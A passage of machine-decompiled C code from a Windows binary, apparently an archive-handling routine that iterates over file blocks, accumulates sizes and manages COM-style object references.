				signed int _t1125;
				signed int _t1127;
				intOrPtr _t1141;
				intOrPtr _t1144;
				signed int _t1149;
				signed int _t1153;
				intOrPtr _t1158;
				signed int _t1165;
				signed int _t1179;
				signed int _t1181;
				signed int _t1188;
				intOrPtr _t1193;
				signed int _t1197;
				signed int _t1206;
				void* _t1207;
				signed int _t1212;
				signed int _t1213;
				signed int _t1217;
				signed int _t1232;
				signed int _t1235;
				signed int _t1237;
				signed int _t1238;
				signed int _t1249;
				signed int* _t1254;
				signed int _t1255;
				signed int _t1268;
				signed int _t1271;
				signed int _t1272;
				signed int _t1286;
				signed int _t1287;
				signed int _t1298;
				intOrPtr _t1301;
				signed int _t1305;
				signed int _t1306;
				signed int _t1312;
				signed int _t1321;
				signed int _t1322;
				signed int _t1340;
				signed int _t1343;
				intOrPtr _t1344;
				intOrPtr _t1345;
				signed int _t1347;
				signed int _t1350;
				signed int _t1363;
				intOrPtr _t1364;
				signed int _t1367;
				signed int _t1371;
				signed int _t1372;
				intOrPtr _t1391;
				signed int _t1392;
				signed int _t1393;
				intOrPtr _t1409;
				signed int _t1414;
				signed int _t1415;
				signed int _t1417;
				void* _t1420;
				intOrPtr _t1428;
				signed int _t1429;
				signed int _t1431;
				signed int _t1434;
				intOrPtr _t1436;
				intOrPtr _t1438;
				signed int _t1441;
				void* _t1445;
				intOrPtr _t1448;
				intOrPtr _t1459;
				intOrPtr _t1543;
				intOrPtr _t1547;
				signed int _t1548;
				signed int _t1555;
				signed int _t1573;
				signed int* _t1577;
				signed int _t1589;
				intOrPtr _t1601;
				intOrPtr _t1627;
				intOrPtr _t1651;
				intOrPtr _t1657;
				signed int _t1667;
				intOrPtr* _t1694;
				signed int _t1701;
				signed int _t1706;
				signed int _t1708;
				intOrPtr* _t1709;
				signed int _t1715;
				signed int _t1719;
				signed int _t1724;
				signed int _t1728;
				intOrPtr _t1729;
				signed int _t1730;
				intOrPtr _t1733;
				intOrPtr _t1738;
				signed int* _t1740;
				intOrPtr* _t1742;
				signed int _t1745;
				signed int _t1746;
				void* _t1751;
				intOrPtr _t1757;
				intOrPtr* _t1758;
				signed int _t1759;
				intOrPtr _t1760;
				signed int _t1763;
				intOrPtr _t1764;
				signed int _t1765;
				intOrPtr* _t1767;
				signed int _t1768;
				signed int _t1769;
				signed int _t1771;
				signed int _t1774;
				signed int _t1775;
				signed int _t1776;
				intOrPtr* _t1777;
				intOrPtr _t1779;
				signed int _t1780;
				intOrPtr* _t1782;
				void* _t1785;
				void* _t1787;
				void* _t1788;
				void* _t1790;
				void* _t1824;
				void* _t1826;

				L0046B890(0x477a16, _t1785);
				_t1788 = _t1787 - 0x4c0;
				 *((intOrPtr*)(_t1785 - 0x98)) = __ecx;
				_t1448 =  *((intOrPtr*)(_t1785 + 0x1c));
				_t1445 = __edx;
				_t1032 =  *(_t1448 + 0x10);
				_t1728 =  *(_t1448 + 0x14);
				 *(_t1785 - 0x70) = _t1032;
				 *(_t1785 - 0x6c) = _t1728;
				_t1745 = 0;
				if((_t1032 | _t1728) == 0) {
					 *(_t1785 - 0x70) = 1;
					 *(_t1785 - 0x6c) = _t1745;
				}
				if(_t1445 == _t1745) {
					_t1729 = 0;
					_t1034 = 0;
					__eflags = 0;
				} else {
					_t1729 =  *((intOrPtr*)(_t1445 + 0x138));
					_t1034 =  *((intOrPtr*)(_t1445 + 0x13c));
				}
				if(_t1034 > _t1745 || _t1729 > _t1745) {
					if( *((char*)(_t1448 + 0x21)) != 0) {
						goto L9;
					}
					_push(_t1745);
					_push(_t1034);
					_push(_t1729);
					_push(_t1745);
					_push(_t1745);
					_t1076 = L00432A5E( *((intOrPtr*)(_t1785 - 0x98)),  *(_t1785 + 0x14));
					if(_t1076 != _t1745) {
						goto L286;
					}
					goto L9;
				} else {
					L9:
					E00404AD0(_t1785 - 0xd4, 4);
					 *((intOrPtr*)(_t1785 - 0xd4)) = 0x47a668;
					 *(_t1785 - 4) = _t1745;
					E00404AD0(_t1785 - 0xb4, 0xc);
					 *((intOrPtr*)(_t1785 - 0xb4)) = 0x47b41c;
					 *(_t1785 - 0x26) =  *(_t1785 - 0x26) & 0x00000000;
					_t1757 =  *((intOrPtr*)(_t1785 + 8));
					 *(_t1785 - 4) = 1;
					 *(_t1785 - 0x54) = _t1745;
					 *(_t1785 - 0x50) = _t1745;
					 *(_t1785 - 0x78) = _t1745;
					 *(_t1785 - 0x74) = _t1745;
					if(_t1445 == _t1745) {
						L43:
						_t1730 =  *(_t1757 + 8);
						 *(_t1785 - 0x34) = _t1745;
						 *(_t1785 - 0x30) = _t1745;
						 *(_t1785 - 0x10) = _t1745;
						if(_t1730 <= _t1745) {
							L55:
							_t1037 =  *(_t1785 - 0x74);
							_t1824 = _t1037 -  *(_t1785 - 0x30);
							if(_t1824 >= 0 && (_t1824 > 0 ||  *(_t1785 - 0x78) >  *(_t1785 - 0x34))) {
								 *(_t1785 - 0x30) = _t1037;
								 *(_t1785 - 0x34) =  *(_t1785 - 0x78);
							}
							_t1826 =  *(_t1785 - 0x30) - _t1745;
							if(_t1826 <= 0 && (_t1826 < 0 ||  *(_t1785 - 0x34) < 0x10000)) {
								 *(_t1785 - 0x34) = 0x10000;
								 *(_t1785 - 0x30) = _t1745;
							}
							_t1758 =  *((intOrPtr*)(_t1785 + 0x18));
							_t1040 =  *((intOrPtr*)( *_t1758 + 0xc))(_t1758,  *(_t1785 - 0x54),  *(_t1785 - 0x50));
							if(_t1040 == _t1745) {
								_push(0x38);
								_t1041 = L004079F2();
								 *(_t1785 - 0x68) = _t1041;
								__eflags = _t1041 - _t1745;
								 *(_t1785 - 4) = 2;
								if(_t1041 == _t1745) {
									_t1746 = 0;
									__eflags = 0;
								} else {
									_t1746 = L0040F3E5(_t1041);
								}
								__eflags = _t1746;
								 *(_t1785 - 0x68) = _t1746;
								 *(_t1785 - 4) = 1;
								 *(_t1785 - 0x74) = _t1746;
								if(_t1746 != 0) {
									 *((intOrPtr*)( *_t1746 + 4))(_t1746);
								}
								_push(1);
								 *(_t1785 - 4) = 3;
								L0040F478(_t1746, _t1758);
								L0043333A(_t1785 - 0x2cc, __eflags);
								__eflags =  *(_t1785 - 0xac);
								 *(_t1785 - 4) = 4;
								if( *(_t1785 - 0xac) == 0) {
									L72:
									E00405B9F(_t1785 - 0x4c);
									 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
									 *(_t1785 - 4) = 5;
									_t1759 = 4;
									do {
										L004335AA(_t1785 - 0xe8);
										_push(_t1785 - 0xe8);
										 *(_t1785 - 4) = 6;
										L004336E2(_t1785 - 0x4c);
										 *(_t1785 - 4) = 5;
										E00408604(_t1785 - 0xe8);
										_t1759 = _t1759 - 1;
										__eflags = _t1759;
									} while (_t1759 != 0);
									_t1049 =  *((intOrPtr*)(_t1785 + 0x1c));
									_t1760 =  *_t1049;
									 *(_t1785 - 0x11) =  *((intOrPtr*)(_t1049 + 8));
									__eflags =  *((intOrPtr*)(_t1760 + 8)) - 1;
									if( *((intOrPtr*)(_t1760 + 8)) != 1) {
										L76:
										_t175 = _t1785 - 0x11;
										 *_t175 =  *(_t1785 - 0x11) & 0x00000000;
										__eflags =  *_t175;
										L77:
										_t1459 =  *((intOrPtr*)(_t1785 + 8));
										 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
										__eflags =  *(_t1459 + 8);
										if( *(_t1459 + 8) <= 0) {
											L94:
											 *(_t1785 - 0xa0) =  *(_t1785 - 0xa0) & 0x00000000;
											__eflags =  *(_t1785 - 0x26);
											if(__eflags == 0) {
												L109:
												_push(0);
												_t1050 = L0042F495( *((intOrPtr*)(_t1785 + 0xc)), __eflags,  *(_t1785 + 0x14));
												__eflags = _t1050;
												 *(_t1785 + 0x14) = _t1050;
												if(_t1050 == 0) {
													_t1051 = L0042F522( *((intOrPtr*)(_t1785 + 0xc)));
													__eflags = _t1051;
													 *(_t1785 + 0x14) = _t1051;
													if(_t1051 == 0) {
														 *((intOrPtr*)(_t1746 + 0x18)) = 0;
														 *(_t1785 - 0x24) = 0;
														 *((intOrPtr*)(_t1746 + 0x1c)) = 0;
														 *(_t1785 - 0x2c) = 0;
														do {
															_t1762 =  *(_t1785 - 0x2c);
															 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x40)) +  *(_t1785 - 0x2c) * 4));
															E00428499(_t1785 - 0x1b4);
															 *(_t1785 - 4) = 0xe;
															__eflags = L0043351E( *(_t1785 - 0x2c));
															if(__eflags == 0) {
																E00428562(_t1785 - 0x1b4,  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))));
															} else {
																_push(_t1785 - 0x1b4);
																_t1730 =  *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)) + 9));
																L00433001( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 0x1c)))), _t1730, __eflags);
															}
															_t1058 = L00433524(_t1762);
															__eflags = _t1058;
															if(_t1058 == 0) {
																_t1059 =  *(_t1785 - 0x184);
																 *(_t1785 - 0x188) =  *(_t1785 - 0x188) & 0x00000000;
																 *(_t1785 - 0x180) =  *(_t1785 - 0x180) & 0x00000000;
																 *_t1059 =  *_t1059 & 0x00000000;
																__eflags =  *_t1059;
															} else {
																__eflags =  *(_t1785 - 0x188);
																if(__eflags == 0) {
																	_t1372 =  *(_t1785 - 0xa0);
																	__eflags = _t1372;
																	if(__eflags != 0) {
																		__eflags = _t1372 + 8;
																		E00401E26(_t1785 - 0x184, _t1372 + 8);
																	}
																	 *(_t1785 - 0x188) = 1;
																}
															}
															_push(_t1785 - 0x1b4);
															E004283DB(_t1785 - 0x4cc, __eflags);
															_t1062 =  *(_t1785 - 0x24);
															 *(_t1785 - 4) = 0xf;
															__eflags = _t1062 -  *(_t1785 - 0xac);
															if(_t1062 >=  *(_t1785 - 0xac)) {
																L168:
																_t1763 =  *( *((intOrPtr*)(_t1785 - 0x58)) + 8);
																__eflags = _t1763;
																 *(_t1785 - 0x20) = _t1763;
																if(_t1763 == 0) {
																	goto L225;
																}
																E00404AD0(_t1785 - 0x138, 0x14);
																 *((intOrPtr*)(_t1785 - 0x138)) = 0x47b3fc;
																 *(_t1785 - 4) = 0x1c;
																E0040867E(_t1785 - 0x138, _t1763);
																__eflags =  *(_t1785 - 0x6c);
																if( *(_t1785 - 0x6c) > 0) {
																	L171:
																	 *(_t1785 - 0x9c) = 1;
																	L173:
																	 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																	__eflags = _t1763;
																	if(_t1763 <= 0) {
																		L176:
																		L0043375E(_t1785 - 0x138, _t1730, 0x432eb7, _t1785 - 0x9c);
																		E00404AD0(_t1785 - 0xfc, 4);
																		 *((intOrPtr*)(_t1785 - 0xfc)) = 0x47ab80;
																		 *(_t1785 - 4) = 0x1d;
																		E0040867E(_t1785 - 0xfc, _t1763);
																		__eflags = _t1763;
																		if(_t1763 <= 0) {
																			L179:
																			 *(_t1785 - 0x10) =  *(_t1785 - 0x10) & 0x00000000;
																			__eflags = _t1763;
																			if(_t1763 <= 0) {
																				L224:
																				 *(_t1785 - 4) = 0x1c;
																				E00408604(_t1785 - 0xfc);
																				 *(_t1785 - 4) = 0xf;
																				E00408604(_t1785 - 0x138);
																				goto L225;
																			}
																			while(1) {
																				 *(_t1785 - 0x94) = 0;
																				 *(_t1785 - 0x90) = 0;
																				 *(_t1785 - 0xc0) = 0;
																				 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																				 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																				E00401E9A(_t1785 - 0xc0, 3);
																				 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																				__eflags =  *(_t1785 - 0x10) - _t1763;
																				 *(_t1785 - 4) = 0x1e;
																				if( *(_t1785 - 0x10) >= _t1763) {
																					goto L198;
																				}
																				while(1) {
																					L183:
																					_t1555 =  *(_t1785 + 0x14);
																					_t1188 = _t1555;
																					asm("cdq");
																					__eflags = _t1730 -  *(_t1785 - 0x6c);
																					if(__eflags > 0) {
																						break;
																					}
																					if(__eflags < 0) {
																						L186:
																						_t1559 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4));
																						 *(_t1785 - 0x94) =  *(_t1785 - 0x94) +  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *((intOrPtr*)(_t1785 - 0xf0)) + (_t1555 +  *(_t1785 - 0x10)) * 4) * 4)) + 0x20));
																						_t1193 =  *((intOrPtr*)(_t1785 + 0x1c));
																						asm("adc [ebp-0x90], edx");
																						_t1730 =  *(_t1785 - 0x90);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x1c));
																						if(__eflags > 0) {
																							break;
																						}
																						if(__eflags < 0) {
																							L189:
																							__eflags =  *((char*)(_t1193 + 0x20));
																							if( *((char*)(_t1193 + 0x20)) == 0) {
																								L194:
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 1;
																								__eflags =  *(_t1785 + 0x14) +  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																								if( *(_t1785 + 0x14) +  *(_t1785 - 0x10) <  *(_t1785 - 0x20)) {
																									continue;
																								}
																								break;
																							}
																							E00430E91(_t1559, _t1785 - 0x84);
																							__eflags =  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x1f;
																							if( *(_t1785 + 0x14) != 0) {
																								_t1730 =  *(_t1785 - 0xc0);
																								_t1197 = E0040807A(_t1730);
																								__eflags = _t1197;
																								if(_t1197 != 0) {
																									 *(_t1785 - 4) = 0x1e;
																									L00407A18( *(_t1785 - 0x84));
																									break;
																								}
																								L193:
																								 *(_t1785 - 4) = 0x1e;
																								L00407A18( *(_t1785 - 0x84));
																								goto L194;
																							}
																							E00401E26(_t1785 - 0xc0, _t1785 - 0x84);
																							goto L193;
																						}
																						_t1730 =  *(_t1785 - 0x94);
																						__eflags = _t1730 -  *((intOrPtr*)(_t1193 + 0x18));
																						if(_t1730 >  *((intOrPtr*)(_t1193 + 0x18))) {
																							break;
																						}
																						goto L189;
																					}
																					__eflags = _t1188 -  *(_t1785 - 0x70);
																					if(_t1188 >=  *(_t1785 - 0x70)) {
																						break;
																					}
																					goto L186;
																				}
																				__eflags =  *(_t1785 + 0x14) - 1;
																				if( *(_t1785 + 0x14) >= 1) {
																					L199:
																					_push(0x78);
																					_t1113 = L004079F2();
																					 *(_t1785 - 0x18) = _t1113;
																					__eflags = _t1113;
																					 *(_t1785 - 4) = 0x20;
																					if(_t1113 == 0) {
																						_t1114 = 0;
																						__eflags = 0;
																					} else {
																						_t1114 = E00429B31(_t1113);
																					}
																					__eflags = _t1114;
																					 *(_t1785 - 0x1c) = _t1114;
																					 *(_t1785 - 4) = 0x1e;
																					 *(_t1785 - 0x50) = _t1114;
																					if(_t1114 != 0) {
																						 *((intOrPtr*)( *_t1114 + 4))(_t1114);
																					}
																					_push( *(_t1785 + 0x14));
																					 *(_t1785 - 4) = 0x21;
																					E00429C75( *(_t1785 - 0x1c),  *((intOrPtr*)(_t1785 + 0x18)), ( *(_t1785 - 0x10) << 2) +  *((intOrPtr*)(_t1785 - 0xf0)));
																					E0042DB56(_t1785 - 0x3a4);
																					_push(_t1746);
																					_push( *((intOrPtr*)(_t1785 + 0x10)));
																					_t1768 =  *( *((intOrPtr*)(_t1785 + 0x10)) + 8);
																					 *(_t1785 - 4) = 0x22;
																					_push( *( *((intOrPtr*)(_t1785 + 0xc)) + 0x50));
																					_push(_t1785 - 0x3a4);
																					_push(_t1785 - 0x34);
																					_push(0);
																					_push( *(_t1785 - 0x1c));
																					_t1125 = L004279E7(_t1785 - 0x4cc, _t1730, __eflags);
																					__eflags = _t1125;
																					 *(_t1785 - 0x18) = _t1125;
																					if(__eflags != 0) {
																						 *(_t1785 - 4) = 0x21;
																						L0042B864(_t1785 - 0x3a4, __eflags);
																						_t1127 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1127;
																						if(_t1127 != 0) {
																							 *((intOrPtr*)( *_t1127 + 8))(_t1127);
																						}
																						L00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x23;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						L0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 =  *(_t1785 - 0x18);
																					} else {
																						_t1141 =  *((intOrPtr*)(_t1785 + 0x10));
																						while(1) {
																							__eflags = _t1768 -  *((intOrPtr*)(_t1141 + 8));
																							if(_t1768 >=  *((intOrPtr*)(_t1141 + 8))) {
																								break;
																							}
																							_t1730 =  *( *((intOrPtr*)(_t1141 + 0xc)) + _t1768 * 8);
																							 *((intOrPtr*)(_t1746 + 0x28)) =  *((intOrPtr*)(_t1746 + 0x28)) + _t1730;
																							asm("adc [edi+0x2c], ecx");
																							_t1768 = _t1768 + 1;
																						}
																						 *((intOrPtr*)(_t1746 + 0x20)) =  *((intOrPtr*)(_t1746 + 0x20)) + E00429826(_t1785 - 0x3a4);
																						_push(_t1785 - 0x3a4);
																						_t1144 =  *((intOrPtr*)(_t1785 + 0x10));
																						asm("adc [edi+0x24], edx");
																						_t693 = _t1144 + 0x3c; // 0x3c
																						L0042F063(_t693);
																						_t1769 = 0;
																						__eflags =  *(_t1785 + 0x14);
																						 *(_t1785 - 0x18) = 0;
																						if(__eflags <= 0) {
																							L221:
																							_t750 =  *((intOrPtr*)(_t1785 + 0x10)) + 0x50; // 0x50
																							E00415C6D(_t750,  *(_t1785 - 0x18));
																							_t1771 =  *(_t1785 - 0x10) +  *(_t1785 + 0x14);
																							 *(_t1785 - 4) = 0x21;
																							 *(_t1785 - 0x10) = _t1771;
																							L0042B864(_t1785 - 0x3a4, __eflags);
																							_t1149 =  *(_t1785 - 0x1c);
																							 *(_t1785 - 4) = 0x1e;
																							__eflags = _t1149;
																							if(_t1149 != 0) {
																								 *((intOrPtr*)( *_t1149 + 8))(_t1149);
																							}
																							 *(_t1785 - 4) = 0x1d;
																							L00407A18( *(_t1785 - 0xc0));
																							__eflags = _t1771 -  *(_t1785 - 0x20);
																							if(_t1771 <  *(_t1785 - 0x20)) {
																								_t1763 =  *(_t1785 - 0x20);
																								 *(_t1785 - 0x94) = 0;
																								 *(_t1785 - 0x90) = 0;
																								 *(_t1785 - 0xc0) = 0;
																								 *((intOrPtr*)(_t1785 - 0xbc)) = 0;
																								 *((intOrPtr*)(_t1785 - 0xb8)) = 0;
																								E00401E9A(_t1785 - 0xc0, 3);
																								 *(_t1785 + 0x14) =  *(_t1785 + 0x14) & 0x00000000;
																								__eflags =  *(_t1785 - 0x10) - _t1763;
																								 *(_t1785 - 4) = 0x1e;
																								if( *(_t1785 - 0x10) >= _t1763) {
																									goto L198;
																								}
																								goto L183;
																							} else {
																								goto L224;
																							}
																						}
																						_t1153 =  *(_t1785 - 0x10) << 2;
																						__eflags = _t1153;
																						 *(_t1785 - 0x38) = _t1153;
																						while(1) {
																							 *((intOrPtr*)(_t1785 - 0x58)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) +  *( *(_t1785 - 0x38) +  *((intOrPtr*)(_t1785 - 0xf0))) * 4));
																							L0042EAC2(_t1785 - 0x124);
																							_t1158 =  *((intOrPtr*)(_t1785 - 0x58));
																							 *(_t1785 - 4) = 0x24;
																							__eflags =  *((char*)(_t1158 + 0x39));
																							_push(_t1785 - 0x2f4);
																							if( *((char*)(_t1158 + 0x39)) == 0) {
																								_push(_t1785 - 0x124);
																								_push( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)))));
																								E004308F5(_t1445);
																							} else {
																								_t1730 = _t1785 - 0x124;
																								L0043327A( *((intOrPtr*)(_t1785 - 0x58)), _t1730);
																							}
																							__eflags =  *((char*)(_t1785 - 0x2d0));
																							if(__eflags != 0) {
																								break;
																							}
																							__eflags =  *((char*)(_t1785 - 0x107));
																							if(__eflags != 0) {
																								break;
																							}
																							_t1179 =  *(_t1785 - 0x1c);
																							_t1543 =  *((intOrPtr*)(_t1179 + 0x48));
																							__eflags =  *((char*)(_t1543 + _t1769));
																							if( *((char*)(_t1543 + _t1769)) != 0) {
																								 *((intOrPtr*)(_t1785 - 0x118)) =  *((intOrPtr*)( *((intOrPtr*)(_t1179 + 0x5c)) + _t1769 * 4));
																								_t1547 =  *((intOrPtr*)(_t1179 + 0x70));
																								_t1181 =  *(_t1547 + _t1769 * 8);
																								 *(_t1785 - 0x124) = _t1181;
																								_t1548 =  *(_t1547 + 4 + _t1769 * 8);
																								__eflags = _t1181 | _t1548;
																								 *(_t1785 - 0x120) = _t1548;
																								if((_t1181 | _t1548) == 0) {
																									 *(_t1785 - 0x106) =  *(_t1785 - 0x106) & 0x00000000;
																									_t738 = _t1785 - 0x108;
																									 *_t738 =  *(_t1785 - 0x108) & 0x00000000;
																									__eflags =  *_t738;
																								} else {
																									 *(_t1785 - 0x18) =  *(_t1785 - 0x18) + 1;
																									 *(_t1785 - 0x106) = 1;
																									 *(_t1785 - 0x108) = 1;
																								}
																								_push(_t1785 - 0x2f4);
																								_push(_t1785 - 0x124);
																								E00430A4F( *((intOrPtr*)(_t1785 + 0x10)));
																							}
																							 *(_t1785 - 4) = 0x22;
																							L00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																							 *(_t1785 - 0x38) =  *(_t1785 - 0x38) + 4;
																							_t1769 = _t1769 + 1;
																							__eflags = _t1769 -  *(_t1785 + 0x14);
																							if(__eflags < 0) {
																								continue;
																							} else {
																								goto L221;
																							}
																						}
																						L00407A18( *((intOrPtr*)(_t1785 - 0x114)));
																						 *(_t1785 - 4) = 0x21;
																						L0042B864(_t1785 - 0x3a4, __eflags);
																						_t1165 =  *(_t1785 - 0x1c);
																						 *(_t1785 - 4) = 0x1e;
																						__eflags = _t1165;
																						if(_t1165 != 0) {
																							 *((intOrPtr*)( *_t1165 + 8))(_t1165);
																						}
																						L00407A18( *(_t1785 - 0xc0));
																						 *(_t1785 - 4) = 0x1c;
																						E00408604(_t1785 - 0xfc);
																						 *(_t1785 - 4) = 0xf;
																						E00408604(_t1785 - 0x138);
																						 *(_t1785 - 4) = 0xe;
																						E00428A47(_t1785 - 0x4cc);
																						 *(_t1785 - 4) = 5;
																						E00428510(_t1785 - 0x1b4, __eflags);
																						 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																						 *(_t1785 - 4) = 0x25;
																						E0040862D();
																						 *(_t1785 - 4) = 4;
																						E00408604(_t1785 - 0x4c);
																						 *(_t1785 - 4) = 3;
																						L0043353F(_t1785 - 0x2cc, __eflags);
																						__eflags = _t1746;
																						 *(_t1785 - 4) = 1;
																						if(_t1746 != 0) {
																							 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																						}
																						 *(_t1785 - 4) =  *(_t1785 - 4) & 0x00000000;
																						E00408604(_t1785 - 0xb4);
																						 *(_t1785 - 4) =  *(_t1785 - 4) | 0xffffffff;
																						E00408604(_t1785 - 0xd4);
																						_t1076 = 0x80004005;
																					}
																					goto L286;
																				}
																				L198:
																				 *(_t1785 + 0x14) = 1;
																				goto L199;
																			}
																		}
																		_t590 = _t1785 + 0x14;
																		 *_t590 =  *(_t1785 + 0x14) & 0x00000000;
																		__eflags =  *_t590;
																		 *(_t1785 - 0x18) = _t1763;
																		do {
																			E00415C6D(_t1785 - 0xfc,  *((intOrPtr*)( *(_t1785 + 0x14) +  *((intOrPtr*)(_t1785 - 0x12c)) + 4)));
																			 *(_t1785 + 0x14) =  *(_t1785 + 0x14) + 0x14;
																			_t600 = _t1785 - 0x18;
																			 *_t600 =  *(_t1785 - 0x18) - 1;
																			__eflags =  *_t600;
																		} while ( *_t600 != 0);
																		goto L179;
																	} else {
																		goto L174;
																	}
																	do {
																		L174:
																		_push( *(_t1785 - 0x9c));
																		_t1206 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1785 - 0x58)) + 0xc)) +  *(_t1785 - 0x10) * 4);
																		_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t1785 + 8)) + 0xc)) + _t1206 * 4)));
																		_push(_t1206);
																		_t1207 = L00432D91(_t1785 - 0x3b8);
																		_t1790 = _t1788 - 0x14;
																		_t1573 = 5;
																		memcpy(_t1790, _t1207, _t1573 << 2);
																		_t1788 = _t1790 + 0xc;
																		L00433730(_t1785 - 0x138);
																		 *(_t1785 - 0x10) =  *(_t1785 - 0x10) + 1;
																		__eflags =  *(_t1785 - 0x10) -  *(_t1785 - 0x20);
																	} while ( *(_t1785 - 0x10) <  *(_t1785 - 0x20));
																	_t1746 =  *(_t1785 - 0x68);
																	_t1763 =  *(_t1785 - 0x20);
																	goto L176;
																}
																__eflags =  *(_t1785 - 0x70) - 1;
																if( *(_t1785 - 0x70) <= 1) {
																	_t561 = _t1785 - 0x9c;
																	 *_t561 =  *(_t1785 - 0x9c) & 0x00000000;
																	__eflags =  *_t561;
																	goto L173;
																}
																goto L171;
															} else {
																_t1212 = _t1062 + _t1062 * 2 << 2;
																 *(_t1785 - 0x1c) = _t1212;
																while(1) {
																	_t1213 = _t1212 +  *((intOrPtr*)(_t1785 - 0xa8));
																	 *(_t1785 - 0x38) = _t1213;
																	__eflags =  *((intOrPtr*)(_t1213 + 4)) -  *(_t1785 - 0x2c);
																	if( *((intOrPtr*)(_t1213 + 4)) !=  *(_t1785 - 0x2c)) {
																		goto L168;
																	}
																	_t1577 =  *(_t1785 - 0x38);
																	_t1733 =  *((intOrPtr*)(_t1445 + 0x5c));
																	_t1215 =  *_t1577;
																	_t1774 =  *_t1577 << 2;
																	__eflags = _t1577[2] -  *((intOrPtr*)(_t1774 + _t1733));
																	if(_t1577[2] !=  *((intOrPtr*)(_t1774 + _t1733))) {
																		L004329C5(_t1785 - 0x1d4);
																		 *(_t1785 - 4) = 0x11;
																		_t1217 = L0040F595(_t1785 - 0x1d4);
																		__eflags = _t1217;
																		 *(_t1785 + 0x14) = _t1217;
																		if(_t1217 != 0) {
																			 *(_t1785 - 4) = 0xf;
																			L00423D3B(_t1785 - 0x1d4);
																			 *(_t1785 - 4) = 0xe;
																			E00428A47(_t1785 - 0x4cc);
																			 *(_t1785 - 4) = 5;
																			E00428510(_t1785 - 0x1b4, __eflags);
																			 *((intOrPtr*)(_t1785 - 0x4c)) = 0x47b414;
																			 *(_t1785 - 4) = 0x12;
																			E0040862D();
																			 *(_t1785 - 4) = 4;
																			E00408604(_t1785 - 0x4c);
																			 *(_t1785 - 4) = 3;
																			L0043353F(_t1785 - 0x2cc, __eflags);
																			__eflags = _t1746;
																			 *(_t1785 - 4) = 1;
																			if(_t1746 != 0) {
																				 *((intOrPtr*)( *_t1746 + 8))(_t1746);
																			}
																			_t1765 =  *(_t1785 + 0x14);
																			goto L285;
																		}
																		 *(_t1785 + 0x20) =  *(_t1785 + 0x20) & _t1217;
																		 *(_t1785 - 0x64) =  *(_t1785 - 0x64) & _t1217;
																		_push(_t1785 + 0x20);
																		_push(_t1785 - 0x64);
																		 *(_t1785 - 4) = 0x14;
																		L0040F5DB(_t1785 - 0x1d4);
																		E00404AD0(_t1785 - 0xe8, 1);
																		 *((intOrPtr*)(_t1785 - 0xe8)) = 0x47ab08;
																		 *(_t1785 - 0x20) =  *(_t1785 - 0x20) & 0x00000000;
																		 *(_t1785 - 4) = 0x15;
																		_t1589 =  *(_t1774 +  *((intOrPtr*)(_t1445 + 0x5c)));
																		__eflags = _t1589;
																		_t1232 =  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774);
																		 *(_t1785 - 0x18) = _t1589;
																		if(_t1589 <= 0) {
																			L146:
																			_t1235 = E00430EFB( *((intOrPtr*)(_t1785 - 0x2b0)), _t1785, _t1445,  *( *((intOrPtr*)(_t1445 + 0x1a4)) + _t1774), _t1785 - 0xe8,  *(_t1785 + 0x20));
																			__eflags = _t1235;
																			 *(_t1785 + 0x14) = _t1235;
																			if(_t1235 != 0) {
																				 *(_t1785 - 4) = 0x14;
																				E00408604(_t1785 - 0xe8);
																				_t1237 =  *(_t1785 - 0x64);
																				 *(_t1785 - 4) = 0x13;
																				__eflags = _t1237;
																				if(_t1237 != 0) {
																					 *((intOrPtr*)( *_t1237 + 8))(_t1237);
																				}
																				_t1238 =  *(_t1785 + 0x20);
																				 *(_t1785 - 4) = 0x11;
																				__eflags = _t1238;
																				if(_t1238 != 0) {
																					 *((intOrPtr*)( *_t1238 + 8))(_t1238);
																				}
																				 *(_t1785 - 4) = 0xf;
																				L00423D3B(_t1785 - 0x1d4);
																				 *(_t1785 - 4) = 0xe;
